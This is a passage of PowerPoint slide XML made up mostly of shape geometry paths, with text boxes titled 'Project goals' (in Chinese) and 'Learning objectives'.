                <a:lnTo>
                  <a:pt x="46261" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64045" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56880" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46261" y="2250"/>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6" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="7048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7" name="AutoShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="3810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8" name="AutoShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="5429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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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0" name="AutoShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="7048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1" name="AutoShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="38100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2" name="AutoShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="5429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3" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="219075"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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4" name="Freeform 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="70485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5" name="Freeform 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="38100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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="542925"/>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Freeform 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="7048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638175" y="38100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0" name="AutoShape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="5429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1" name="Freeform 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="219075"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33337" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="8381"/>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1"/>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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="7048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390525" y="38100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4" name="AutoShape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="5429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5" name="Freeform 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191875" y="3657600"/>
            <a:ext cx="1000125" cy="3238500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1000125" h="3238500">
                <a:moveTo>
                  <a:pt x="1000125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125"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43" name="Freeform 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5143500"/>
            <a:ext cx="2133600" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2133600" h="1333500">
                <a:moveTo>
                  <a:pt x="1466850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1331825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="1326878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="1318771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="1307617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="1293528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="1276617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="1256998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="1234782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="1210083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="1183014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="1153688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="1122217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="1088713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="1053291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="1016063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="977141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="936638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="894668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="851343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="806776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="761079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="714366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="666750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="619140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="572434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="526742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="482179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="438856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="396888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="356386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="317465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="280236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="244812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="211307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="179834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="150505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="123433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="98732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="76514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="56892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="39978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="25887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="14731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="6622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850"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4" name="Freeform 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6262682"/>
            <a:ext cx="1633855" cy="595630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1633855" h="595629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1033462" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1080357" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126266" y="7137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171055" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214591" y="27823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256741" y="42915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297370" y="60995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336345" y="81930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373533" y="105587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408801" y="131832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442014" y="160531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473040" y="191551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501744" y="224760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1527994" y="260023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551655" y="297207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572595" y="336178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590679" y="376804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605775" y="418951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617748" y="462485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626466" y="507274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631795" y="553183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1633417" y="595316"/>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5" name="Freeform 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6072187"/>
            <a:ext cx="1891030" cy="786130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1891030" h="786129">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1100137" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1148304" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195707" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242264" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287891" y="22423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332508" y="34691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376029" y="49460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1418374" y="66645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459459" y="86164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499202" y="107936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537519" y="131876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1574329" y="157902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1609548" y="185932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643095" y="215883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1674886" y="247672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704838" y="281216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732869" y="316433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758896" y="353241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782837" y="391556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1804609" y="431295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824129" y="472376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841315" y="514717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856083" y="558235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868352" y="602846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1878038" y="648469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885059" y="695020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889333" y="742417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1890633" y="78581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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5881687"/>
            <a:ext cx="2138680" cy="976630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2138680" h="976629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1157287" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204822" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251774" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1298090" y="10027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343720" y="17690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1388612" y="27426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432715" y="39186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1475977" y="52917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518347" y="68568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559773" y="86087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600204" y="105424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1639590" y="126527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677877" y="149344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715015" y="173825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750953" y="199917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1785638" y="227569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819021" y="256731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851048" y="287350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1881670" y="319375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1910834" y="352755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1938488" y="387438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964583" y="423373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989065" y="460508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2011885" y="498793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032990" y="538176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052329" y="578605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2069850" y="620029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085503" y="662397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099235" y="705657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2110996" y="749757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2120733" y="794647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128397" y="840276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133934" y="886590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137294" y="933541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2138312" y="976311"/>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81" name="AutoShape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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8" name="object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548890" y="748665"/>
            <a:ext cx="1800860" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13970" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1623060" algn="l"/>
                <a:tab pos="3234055" algn="l"/>
                <a:tab pos="4845050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>项目目标</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" spc="10" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548890" y="1282065"/>
            <a:ext cx="9158605" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13970" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1623060" algn="l"/>
                <a:tab pos="3234055" algn="l"/>
                <a:tab pos="4845050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="6600" b="1" spc="10" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000">
                      <a:alpha val="6000"/>
                    </a:sysClr>
                  </a:solidFill>
                </a:ln>
                <a:noFill/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Learning objectives</a:t>
            </a:r>
            <a:endParaRPr sz="6600" b="1" spc="10" dirty="0">
              <a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000">
                    <a:alpha val="6000"/>
                  </a:sysClr>
                </a:solidFill>
              </a:ln>
              <a:noFill/>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625090" y="1263650"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F58830"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85" name="#472308"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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="2209799"/>
            <a:ext cx="9167495" cy="845821"/>
            <a:chOff x="3926561" y="2959704"/>
            <a:chExt cx="7759700" cy="388721"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="ïṡļîḍe"/>
